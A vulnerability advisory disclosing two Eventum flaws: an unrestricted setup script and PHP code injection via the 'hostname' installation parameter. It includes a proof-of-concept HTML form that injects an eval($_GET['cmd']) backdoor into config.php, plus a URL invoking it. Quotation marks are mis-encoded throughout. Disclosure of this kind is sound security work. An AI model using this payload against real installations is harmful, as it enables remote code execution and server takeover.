High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.
Incorrect Default Permissions in Eventum: CVE-2014-1631
The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at β/setup/index.phpβ is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.
The installation script can be access by a remote unauthenticated user via the following URL:
http://[host]/setup/index.php
Code Injection in Eventum: CVE-2014-1632
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter βhostnameβ in β/config/config.phpβ script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to applicationβs database, which can be achieved by providing address of attacker-controlled MySQL server.
The following exploitation example injects a backdoor into β/config/config.phpβ file:
<form action=βhttp://[host]/setup/index.phpβ method=βpostβ name=βmainβ>
<input type=βhiddenβ name=βcatβ value=βinstallβ>
<input type=βhiddenβ name=βhostnameβ value=ββ); eval($_GET[βcmdβ]); $tmp=(ββ>
<input type=βhiddenβ name=βrelativeβ value=β/β>
<input type=βhiddenβ name=βdb_hostnameβ value=βdb_hostnameβ>
<input type=βhiddenβ name=βdb_nameβ value=βdb_nameβ>
<input type=βhiddenβ name=βdb_table_prefixβ value=βdb_table_prefixβ>
<input type=βhiddenβ name=βdrop_tablesβ value=βyesβ>
<input type=βhiddenβ name=βdb_usernameβ value=βdb_usernameβ>
<input type=βhiddenβ name=βsetup[smtp][from]β value="[email protected]">
<input type=βhiddenβ name=βsetup[smtp][host]β value=βlocalhostβ>
<input type=βhiddenβ name=βsetup[smtp][port]β value=β25β>
<input type=βhiddenβ name=ββ value=ββ>
<input type=βsubmitβ id=βbtnβ>
</form>
After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the βphpinfo()β PHP function on the vulnerable system:
http://[host]/index.php?cmd=phpinfo%28%29;